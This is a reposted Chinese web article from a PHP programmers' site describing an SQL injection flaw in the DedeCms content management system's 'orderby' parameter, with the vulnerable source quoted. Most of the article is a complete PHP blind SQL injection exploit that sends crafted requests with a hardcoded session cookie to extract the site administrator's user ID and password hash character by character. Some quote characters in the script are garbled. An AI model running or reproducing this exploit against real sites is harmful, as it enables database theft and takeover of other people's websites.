PHP程序员站--PHP编程开发平台
| 网站地图 | 高级搜索 | 收藏本站 | RSS订阅 |
   首页 |新闻咨询|PHP基础|PHP高级编程|数据库|服务器|网页制作|PHP开源|下载中心|WAP技术|休闲茶馆|TAG | PHP专题
   开源CMS PHP开源框架 PHP开源论坛 开源电子商务 开源留言博客 其他开源PHP项目
 当前位置:主页 >> PHP开源 >> 开源CMS >> 

dedecms注射漏洞

dedecms注射漏洞

来源:互联网  作者:  发布时间:2008-08-27
漏洞说明:DedeCms由2004年到现在,已经经历了五个版本,从Dede

漏洞说明:DedeCms由2004年到现在,已经经历了五个版本,从DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工制作的直观性提供了极大的便利,从V2.1开始,DedeCms人气急却上升,成为国内最流行的CMS软件,在DedeCms V3版本中,开始引入了模型的概念,从而摆脱里传统网站内容管理对模块太分散,管理不集中的缺点,但随着时间的发展,发现纯粹用模型化并不能满足用户的需求,从而DedeCms 2007(DedeCms V5)应声而出.80sec在其产品中发现了多个严重的SQL注射漏洞,可能被恶意用户查询数据库的敏感信息,如管理员密码,加密key等等,从而控制整个网站。

漏洞厂商:http://www.dedecms.com

漏洞来源:http://www.80sec.com/release/dedecms-sql-injection.txt

漏洞解析:在joblist.php和guestbook_admin.php等文件中对orderby参数未做过滤即带入数据库查询,造成多个注射漏洞。漏洞部分代码如下

以下为引用的内容:
-------------------------------------------------------
if(empty($orderby)) $orderby = 'pubdate';

//重载列表
if($dopost=='getlist'){
PrintAjaxHead();
GetList($dsql,$pageno,$pagesize,$orderby);//调用GetList函数
$dsql->Close();
exit();
……
function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){
global $cfg_phpurl,$cfg_ml;
$jobs = array();
$start = ($pageno-1) * $pagesize;

$dsql->SetQuery("Select * From jyk_jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize ");
$dsql->Execute();//orderby 带入数据库查询
……
----------------------------------------------------------

漏洞利用:80sec提供攻击测试代码如下(如果发现代码无法测试,请访问80sec官方的txt文档):

以下为引用的内容:
<?
print_r('
--------------------------------------------------------------------------------
DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploit
BY Flyh4t
www.wolvez.org
Thx for all the members of W.S.T and my friend Oldjun
--------------------------------------------------------------------------------
');

if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].’ host path
host: target server (ip/hostname)
path: path to DEDEcms
Example:
php ‘.$argv[0].’ localhost /
——————————————————————————–
‘);
die;
}

function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),’80′);
if (!$ock) {
echo ‘No response from ‘.$host; die;
}
fputs($ock,$packet);
$html=”;
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$prefix=”dede_”;
$cookie=”DedeUserID=39255; DedeUserIDckMd5=31283748c5a4b36c; DedeLoginTime=1218471600; DedeLoginTimeckMd5=a7d9577b3b4820fa”;

if (($path[0]<>’/') or ($path[strlen($path)-1]<>’/'))
{echo ‘Error… check the path!’; die;}

/*get $prefix*/
$packet =”GET “.$path.”/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=11′ HTTP/1.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Cookie: “.$cookie.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
sendpacketii($packet);
if (eregi(”in your SQL syntax”,$html))
{
$temp=explode(”From “,$html);
$temp2=explode(”member”,$temp[1]);
if($temp2[0])
$prefix=$temp2[0];
echo “[+]prefix -> “.$prefix.”\n”;
}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
echo “[~]exploting now,plz waiting\r\n”;

/*get password*/
$j=1;$password=”";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+pwd+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;
$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Cookie: “.$cookie.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
sendpacketii($packet);
if (!eregi(”Subquery returns more than 1 row”,$html)) {$password.=chr($i);echo”[+]pwd:”.$password.”\r\n”;break;}
}
if ($i==255) {die(”Exploit failed…”);}
}
$j++;
}

/*get userid*/
$j=1;$admin=”";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+userid+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;
$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0\r\n”;
$packet.=”Host: “.$host.”\r\n”;
$packet.=”Cookie: “.$cookie.”\r\n”;
$packet.=”Connection: Close\r\n\r\n”;
sendpacketii($packet);
if (!eregi(”Subquery returns more than 1 row”,$html)) {$admin.=chr($i);echo”[+]userid:”.$admin.”\r\n”;break;}
if ($i==255) {die(”Exploit failed…”);}
}
$j++;
}

print_r(’
——————————————————————————–
[+]userid -> ‘.$admin.’
[+]pwd(md5 24位) -> ‘.$password.’
——————————————————————————–
‘);
function is_hash($hash)
{
if (ereg(”^[a-f0-9]{24}”,trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo “Exploit succeeded…”;}
else {echo “Exploit failed…”;}
?>

Tags: dedecms   注射   注入   漏洞   漏洞   注射   dedecms   dede   C   CMS   ECMS  
在百度中搜索 "dedecms注射漏洞" 更多相关内容
在谷歌中搜索 "dedecms注射漏洞" 更多相关内容
站内搜索
   
最新文章
·闰秒导致多家知名网站遭遇技术故障
·周鼎:Ubuntu Tweak 五年之历程
·2012年6月份全球主流浏览器市场份额排行榜
·大学里做不出好软件
·诺基亚 CEO:我后悔了 但会改善
·[翻译]大道至简(原标题:少是指数级的多)
·VS 2012 的 C++ 程序将支持 Windows XP
·谷歌高管称 Android 碎片化归咎于手机厂商
·浏览器大战另类升级:统计数据相互打架
·Mac OS X 内发现新的恶意软件
·Red Hat 如何决定收购开源技术公司
·GPLv3发布五周年
·GPLv3发布五周年
·HP 与微软掐架:玩了诺基亚还想玩我?
·Wi-Fi 与 3G 是伙伴?还是对手?
推荐阅读
·dedecms模板中使用php语法
·齐博CMSV7版正式发布
·CMSTOP 今日首次在线公测 测试体验分享(图)
·WordPress 3.0十大看点 CMS功能进一步增强
·CmsTop官网今日改版 称3月18日将进行公测
·疑是帝国CMS(EmpireCMS v 6.0)最新BUG
·dedecms实现"文章标题_栏目二_栏目一_网站名"类型标题(title)
·dedecms最新 tag.php注入漏洞分析与利用
·dedecms Tag不能添加解决办法
·dede5.0 升级5.1出现include\inc_pubtag_make.php on line 288错误的解决方法
·织梦分词算法
·DEDECMS文章点击数为0的解决方法
·PHPCMS 2007 各模块功能介绍
·DedeCms初学者的入门使用指南
·Dedecms4.0RC1整合phpwind 5.3完全攻略
月点击排行榜
·dedecms模板中使用php语法
·织梦CMS(dedecms)系统被曝植入后门 70万网站资料或泄露
·DEDECMS:Safe Alert: Request Error step 1 ! 解决方法
·DEDECMS网站管理系统多个跨站漏洞
·PHPCMS 2007 各模块功能介绍
·织梦分词算法
·dedecms Tag不能添加解决办法
·dedecms实现"文章标题_栏目二_栏目一_网站名"类型标题(title)
·DedeCMS5.6后台程序下载漏洞
·DedeCms初学者的入门使用指南
·30个国外PHP开源CMS内容管理系统推荐
·帝国CMS栏目别名的调用方法详解
·DEDECMS文章点击数为0的解决方法
·帝国CMS 6.5版开发启动 新版注重门户与安全
·从零开始学DedeCms模板,模板制作不求人
网站首页 | 网站地图 | 高级搜索 | RSS订阅
PHP程序员站 Copyright © 2007-2010,PHPERZ.COM All Rights Reserved 粤ICP备07503606号